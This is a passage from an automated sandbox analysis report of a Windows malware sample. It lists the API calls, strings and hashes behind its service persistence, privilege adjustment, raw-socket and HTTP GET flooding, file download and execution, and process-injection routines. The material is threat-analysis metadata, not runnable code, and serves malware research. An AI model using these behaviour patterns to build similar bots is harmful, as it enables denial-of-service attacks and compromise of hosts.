      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00402211
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0040221C
      • wsprintfA.USER32 ref: 00402233
      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0040224C
      • lstrlen.KERNEL32(?), ref: 00402256
      • RegSetValueExA.ADVAPI32(?,Description,00000000,00000001,?,00000000), ref: 0040226B
      Strings
      • Description, xrefs: 00402262
      • SYSTEM\CurrentControlSet\Services\%s, xrefs: 00402227
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$Open$Start$CreateErrorLastManagerValuelstrlenwsprintf
      • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
      • API String ID: 1085164444-2908613140
      • Opcode ID: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction ID: f4580113edc8e433eb06b14144884acc633483daa5052ba9940653bc4dc6f673
      • Opcode Fuzzy Hash: 154c3cc990fdae9aed9d98df527cbfc1d14e78514fef328f6b991c8467dc1853
      • Instruction Fuzzy Hash: 9C319971981224BBD720DF949E49F9F7B7CEB48B51F100169FA15B62C1C7B45910CBA8
      APIs
      • GetCurrentProcess.KERNEL32(00000028), ref: 004013A2
      • OpenProcessToken.ADVAPI32(00000000), ref: 004013A9
      • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004013C3
      • CloseHandle.KERNEL32(00000000), ref: 004013D2
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue
      • String ID:
      • API String ID: 2654680240-0
      • Opcode ID: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction ID: cc2b99641f5a8469a3b4e8ed31b91ddc2a866a93870fc30e959dc988af51fc73
      • Opcode Fuzzy Hash: 8864c288b9cb71c30d5e91295d1a8abcd9c991bda94a8974c1128a605e635a0a
      • Instruction Fuzzy Hash: 61115EB4644301ABE700DF64CD49B6B77E8FF88700F80892CF989E6290E378D9048B67

      Control-flow Graph

      APIs
      • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 00403145
      • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 0040317A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Socketsetsockopt
      • String ID: %u.193.%d.%d$@$E$P
      • API String ID: 4073417641-4005098346
      • Opcode ID: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction ID: 4f5575538a0cf794be7eb95a31b6b2e6ffef1db0ee0ea924ed66e0d3a4dc536f
      • Opcode Fuzzy Hash: 2106d30019bef2af147a48b56c11f1fe6b56fd7c12d80706179d367cc767660b
      • Instruction Fuzzy Hash: 7C81CE711083449AD710DF64DC41BABBBE5AFC8710F00492EF695A72D1DAB49A08CBAB

      Control-flow Graph

      APIs
      • GetModuleHandleA.KERNEL32(ntdll.dll,NtQuerySystemInformation), ref: 0040187B
      • GetProcAddress.KERNEL32(00000000), ref: 00401882
      • GlobalAlloc.KERNEL32(00000040,?), ref: 004018AC
      • LoadLibraryExA.KERNEL32(?,00000000,00000001), ref: 004018E2
      • GetLastError.KERNEL32 ref: 004018F2
      • printf.MSVCRT ref: 004018FE
      • GlobalFree.KERNEL32(?), ref: 00401914
      • GetProcAddress.KERNEL32(00000000,KeServiceDescriptorTable), ref: 00401920
      • printf.MSVCRT ref: 0040192F
      • printf.MSVCRT ref: 00401A10
      Strings
      • Can't find KeServiceDescriptorTable, xrefs: 0040192A
      • strange NtQuerySystemInformation()!, xrefs: 00401A0B
      • Failed to load! LastError=%i, xrefs: 004018F9
      • ntdll.dll, xrefs: 00401870
      • Can't find KiServiceTable..., xrefs: 00401952
      • Possibly KiServiceLimit==%08X, xrefs: 004019EE
      • KeServiceDescriptorTable, xrefs: 0040191A
      • NtQuerySystemInformation, xrefs: 0040186B
      • &KiServiceTable==%08XDumping 'old' ServiceTable:, xrefs: 00401972
      • 0x%x 0x%08X, xrefs: 004019CB
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: printf$AddressGlobalProc$AllocErrorFreeHandleLastLibraryLoadModule
      • String ID: Possibly KiServiceLimit==%08X$&KiServiceTable==%08XDumping 'old' ServiceTable:$0x%x 0x%08X$Can't find KeServiceDescriptorTable$Can't find KiServiceTable...$Failed to load! LastError=%i$KeServiceDescriptorTable$NtQuerySystemInformation$ntdll.dll$strange NtQuerySystemInformation()!
      • API String ID: 3553604609-3775360644
      • Opcode ID: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction ID: 5768c73fbee113661ea424cb43e8d9f95342857d559040dcccde774f527aca14
      • Opcode Fuzzy Hash: ffc0be60d97f5dfd46203039b4cda45ebaa35cf3948b1044d8cdf3999da371ef
      • Instruction Fuzzy Hash: 4E511371240305AFD700EF98DE85D6BB7A8FFC8710F00053EF946A6241E639E915CBAA

      Control-flow Graph

      Control-flow graph of the function at 00402CB0 (basic blocks 402cb0-402fc9, executed and non-executed blocks marked in the original image; calls RegOpenKeyExA, RegQueryValueExA, RegCloseKey, _strnicmp, GetVersionExA, wsprintfA, GlobalMemoryStatusEx, a call to 4056b0, _ui64toa and GetSystemDefaultUILanguage); graph edge list omitted.
      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,?,O5WGU2RYGMXDGMZSGIXG64THHI4DG===,00000000), ref: 00402D06
      • RegQueryValueExA.ADVAPI32 ref: 00402D48
      • RegCloseKey.ADVAPI32(?), ref: 00402D53
      • _strnicmp.MSVCRT ref: 00402D87
      • GetVersionExA.KERNEL32(?), ref: 00402DF2
      • wsprintfA.USER32 ref: 00402EE6
      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00402EFC
      • _ui64toa.MSVCRT ref: 00402F2A
      • GetSystemDefaultUILanguage.KERNEL32 ref: 00402FA0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValueVersion_strnicmp_ui64toawsprintf
      • String ID: %s SP%d$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$ProcessorNameString$Win 2000$Win 2003$Win 95$Win 98$Win NT$Win Vista$Win XP
      • API String ID: 3322224748-824182824
      • Opcode ID: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction ID: 13d3b61b23b45e2e4c023b9cc0fc35249b46de21b34556b10f0f5e52fe902c2b
      • Opcode Fuzzy Hash: f6c0c16aefc7028bb481e130bd88835b7dfbc170d6bdc2f10909af5a7c339e0c
      • Instruction Fuzzy Hash: 108127316047044BD728CA24C904BABB3D6FBC4320F514A3EF95AE73D0DFB99D09868A

      Control-flow Graph

      Control-flow graph of the function at 00404090 (basic blocks 404090-404338, executed and non-executed blocks marked in the original image; calls strstr, strcspn, strncpy, htons, a call to 4030e0, wsprintfA, socket, connect, setsockopt (twice), send, Sleep and closesocket); graph edge list omitted.
      APIs
      Strings
      • http://, xrefs: 004040B9, 004040E2
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 0040426A
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstrwsprintf$closesocketconnecthtonssendsocketstrncpy
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1549958995-1933603558
      • Opcode ID: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction ID: c1fde26447f8656147e6786571948f54528d1b62fa49e0ea339f3debddb0944f
      • Opcode Fuzzy Hash: 3cb8afb7b00b8b5575cc27588711fb03344b411bc078fc065225c7a324a4b3a6
      • Instruction Fuzzy Hash: EB7105722043005BD714DB28DD41AAB77E5FBC8320F014A3EFA56A72D1DEB5DA09CB99

      Control-flow Graph

      Control-flow graph of the function at 00403E20 (basic blocks 403e20-404089, executed and non-executed blocks marked in the original image; calls strstr, strcspn, strncpy, htons, a call to 4030e0, wsprintfA, socket, connect, setsockopt (twice), send, Sleep and closesocket); graph edge list omitted.
      APIs
      • strstr.MSVCRT ref: 00403E69
      • strstr.MSVCRT ref: 00403E8E
      • strcspn.MSVCRT ref: 00403EB0
      • strncpy.MSVCRT ref: 00403EB9
      • strcspn.MSVCRT ref: 00403EC5
      • htons.WS2_32 ref: 00403F52
      • wsprintfA.USER32 ref: 00403FAD
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403FE0
      • connect.WS2_32(00000000,?,00000010), ref: 00403FF0
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 0040400D
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,00000001,00000004), ref: 00404021
      • send.WS2_32(00000000,?,?,00000000), ref: 00404045
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040404D
      • closesocket.WS2_32(00000000), ref: 00404053
      • Sleep.KERNEL32(?,?,00000000), ref: 00404060
      Strings
      • http://, xrefs: 00403E49, 00403E72
      • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 00403FA7
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockoptstrcspnstrstr$closesocketconnecthtonssendsocketstrncpywsprintf
      • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
      • API String ID: 1044657935-1933603558
      • Opcode ID: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction ID: 40c65565b0e2d1f7331450249f0e816538a445790bab8e04dbed30efe200627d
      • Opcode Fuzzy Hash: e261bc258bb4aa3f5bf075d5690df4ef4feadbfeb7c1069f847f69e5be35e265
      • Instruction Fuzzy Hash: 9D61F1722002055AD724DB34DD01BAB77D5FBC8720F004A3EFA56A72D1DEB99A09CB99

      APIs
      • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00401525
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040152E
      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 0040153E
      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 0040154A
      • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00401586
      • strncpy.MSVCRT ref: 004015C9
      • CreateProcessA.KERNEL32 ref: 00401616
      • FreeLibrary.KERNEL32(00000000), ref: 00401623
      • FreeLibrary.KERNEL32(00000000), ref: 00401626
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc$??2@CreateProcessstrncpy
      • String ID: D$GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$c:\2.exe$urlmon.dll$wininet.dll
      • API String ID: 2866020857-3875728843
      • Opcode ID: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction ID: 49b7f00dae4a20d8495a03893bbef6d5a58a1a79a5b00c23ef4317028092d931
      • Opcode Fuzzy Hash: a3c8b419824d17f18d93d8c10aa4d386693e4cce12cf5b51044eb903a2ca5a37
      • Instruction Fuzzy Hash: 9B31AD716443046BE310DB64DC05F6B7BE8EBC4750F14092DB645B72D0DBB5B90587A7

      Control-flow Graph (basic blocks and edges; executed/not-executed colouring not recoverable from the image)
      control_flow_graph 373 404490-4044b8 call 4056d0 LoadLibraryA 376 4045c0-4045d2 FreeLibrary 373->376 377 4044be-4044f9 GetProcAddress * 4 373->377 377->376 378 4044ff 377->378 379 404500-404515 378->379 381 4045a5-4045b9 Sleep 379->381 382 40451b-404554 379->382 381->379 383 4045bf 381->383 385 404556-40456e 382->385 386 40459c-4045a1 382->386 383->376 389 404570-404576 385->389 390 404597 385->390 386->381 389->390 391 404578-40457f 389->391 390->386 391->390 392 404581-404595 391->392 392->389 392->390
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 004044AA
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 004044CA
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 004044D6
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004044E0
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004044EC
      • Sleep.KERNEL32(?), ref: 004045AC
      • FreeLibrary.KERNEL32(00000000), ref: 004045C1
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoadSleep
      • String ID: Cache-Control: no-cacheReferer: http://www.google.com$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$wininet.dll$xq1986
      • API String ID: 4229481857-500719541
      • Opcode ID: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction ID: d5a40d365fb673e185f2af7b8665aa2ffbe594809abcd310f9e1eb4b217c21dd
      • Opcode Fuzzy Hash: e6d9cc5cf04fc7fade2cad51484567136f0c308ff658559d516b8fec7f80a17b
      • Instruction Fuzzy Hash: 083183716443056BD310DF659C45F6BBBE8EFC4B50F10093EB641B62C1EBB8ED048AA9
      APIs
      • LoadLibraryA.KERNEL32(wininet.dll), ref: 0040144C
      • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0040146B
      • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00401475
      • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0040147F
      • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0040148B
      • FreeLibrary.KERNEL32(00000000), ref: 004014EE
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressProc$Library$FreeLoad
      • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$JiangMin$wininet.dll
      • API String ID: 2449869053-1511921226
      • Opcode ID: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction ID: 274010f9111dd31d1687fcd3f1f9594105fbacdfde1de4873f4c05de7ce26b98
      • Opcode Fuzzy Hash: 4891e638b8cfb21faee35d62fad90b6ee993c7db421e5afe19ec04009f83034e
      • Instruction Fuzzy Hash: C511B931A843057BD331ABA59C45F9B76DCDFC5B00F10093AB641B61D1E9BCE90586AA
      APIs
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040385F
      • htons.WS2_32 ref: 0040388A
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • htons.WS2_32(00000305), ref: 004038A7
      • htons.WS2_32(00000100), ref: 004038B3
      • htons.WS2_32(00000001), ref: 004038BC
      • htons.WS2_32(00000001), ref: 004038D6
      • htons.WS2_32(00000001), ref: 004038DF
      • sendto.WS2_32(?,?,0000000C,00000000,?,00000010), ref: 004039EA
      • Sleep.KERNEL32(?), ref: 004039F7
        • Part of subcall function 004011A0: GetTickCount.KERNEL32 ref: 004011B3
        • Part of subcall function 004011A0: srand.MSVCRT ref: 004011BA
        • Part of subcall function 004011A0: rand.MSVCRT ref: 004011C3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: htons$CountSleepTickgethostbynameinet_addrrandsendtosocketsrand
      • String ID: com$www
      • API String ID: 3135813497-1875102311
      • Opcode ID: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction ID: a346ce78095f23929a5207854ff3f73bc1995c101e3e6ceadca4775150165a56
      • Opcode Fuzzy Hash: 5ea3f0c954bce6c043580af0d019b7d28d9a68b9ec05717201942eee02f591bf
      • Instruction Fuzzy Hash: 4E517E716183809AD710DF68D941B5BBBE4FF98704F00093EF685AB391D6B5D608CB5B
      APIs
      • htons.WS2_32 ref: 00404368
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • wsprintfA.USER32 ref: 004043B0
      • socket.WS2_32(00000002,00000001,00000006), ref: 004043E5
      • connect.WS2_32(00000000,?,00000010), ref: 004043F5
      • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 00404412
      • setsockopt.WS2_32(00000000,0000FFFF,00001001,?,00000004), ref: 00404426
      • send.WS2_32(00000000,?,?,00000000), ref: 00404444
      • Sleep.KERNEL32(00000001,?,00000000), ref: 0040444C
      • closesocket.WS2_32(00000000), ref: 00404452
      • Sleep.KERNEL32(?,?,00000000), ref: 0040445E
      Strings
      • GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive, xrefs: 004043AA
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Sleepsetsockopt$closesocketconnectgethostbynamehtonsinet_addrsendsocketwsprintf
      • String ID: GET / HTTP/1.1Host: %s:%dPragma: no-cacheConnection: Keep-Alive
      • API String ID: 3772806076-3649629926
      • Opcode ID: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction ID: cc7d46b8f8966c664a06a087e703ee97f12425e3e4b14521f3d6c012654d40f7
      • Opcode Fuzzy Hash: e254d7ecfb8d5bdaad4f922df4774619181c4e6b67251d8f5c82b1103925ef45
      • Instruction Fuzzy Hash: 7A31B2B12043016EE310DB64DD45FAB77E4EF88714F004A39F685B62D2DBB5DA148B9A
      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00401A3B
      • OpenServiceA.ADVAPI32(00000000,PCIDump,00000010), ref: 00401A4F
      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401A5C
      • puts.MSVCRT ref: 00401A6B
      • CreateFileA.KERNEL32(\\.\Dark2118,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00401A89
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A98
      • CloseServiceHandle.ADVAPI32(00000000), ref: 00401A9B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: Service$CloseHandleOpen$CreateFileManagerStartputs
      • String ID: PCIDump$Start beep service ok$\\.\Dark2118
      • API String ID: 1337555625-3442187310
      • Opcode ID: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction ID: a47457c5b07d48301e3edaf03b4678802010fc7bcf1038e17df538a0db3eeae7
      • Opcode Fuzzy Hash: b6e561f11e318ee7e2f33fc7c7b3acf07a8769b9ac446392d875949841eed154
      • Instruction Fuzzy Hash: C8F062317C23107BF13057297E0AF5A66589BC5F61F260136FB02FA2D1CAF56811457D
      APIs
        • Part of subcall function 00404F50: CreateProcessA.KERNEL32 ref: 00404F95
        • Part of subcall function 00404F50: GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
